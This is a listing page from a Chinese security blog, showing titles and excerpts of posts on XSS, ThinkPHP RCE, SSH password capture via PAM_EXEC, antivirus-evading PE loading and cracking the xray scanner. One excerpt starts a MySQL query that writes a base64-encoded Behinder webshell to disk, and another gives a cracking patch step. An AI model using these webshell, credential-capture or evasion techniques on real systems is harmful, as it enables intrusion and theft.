xss-admin-XSS博客-第18页
EDU从邮箱绕过到系统通杀-XSS博客

EDU从邮箱绕过到系统通杀

一、前言 这个思路呢是作者小白在一次EDU某证书站挖掘的过程中发现的。说到邮箱绕过,很多师傅第一反应应该是系统代码逻辑性问题,比如邮箱叠加/复用以及邮箱重放。 这里呢,作者小白就简单提供...
8个月前
011211
软件破解 - xray1.9.4 破解-XSS博客

软件破解 – xray1.9.4 破解

xray1.9.4 破解 jl 修改为 jnl,点击补丁保存
1年前
014911
ThinkPHP多语言模块文件包含RCE复现详细教程-XSS博客
一处图片引用功能导致的XSS-XSS博客

一处图片引用功能导致的XSS

山重水复疑无路 漏洞点:站点产品评论处 初步测试 一开始尝试XSS,发现程序有过滤,提交均显示Tags are not permitted,最后测出来的是过滤 < ,不过滤 > 因为提示速度比较快,猜测前端有一...
1年前
020511
PAM_EXEC 不用第三方应用和重启抓取ssh密码-XSS博客

PAM_EXEC 不用第三方应用和重启抓取ssh密码

PAM_EXEC 不用第三方应用和重启抓取ssh密码
From PNG tEXt to Persistent XSS (从文本到持久性XSS PNG)-XSS博客

From PNG tEXt to Persistent XSS (从文本到持久性XSS PNG)

From PNG tEXt to Persistent XSS (从文本到持久性XSS PNG)
12个月前
023611
BC实战|从Xss到主机上线-XSS博客

BC实战|从Xss到主机上线

故事的起因 前几天收到一封邮件,内容是这样的: 你说发谁哪里不好,发到我这里来,正好最近辞职了没事干,搞下看看。 加上那个人的好友以后,象征性的聊了几句,大概就是:我说自己因为网赌没...
1年前
014011
mysql写冰蝎马-XSS博客

mysql写冰蝎马

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
1年前
010711
免杀技术 - FilelessPELoader 免杀加载-XSS博客

免杀技术 – FilelessPELoader 免杀加载

FilelessPELoader 免杀加载 分享一个好用的 PE 远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载,免杀大部分的杀软 1、首先安装相关 python 库 pip install pycrypt...
1年前
015211
RTranslator 可离线使用的实时翻译、同声传译软件!免费开源-XSS博客

RTranslator 可离线使用的实时翻译、同声传译软件!免费开源

RTranslator 可离线使用的实时翻译、同声传译软件!免费开源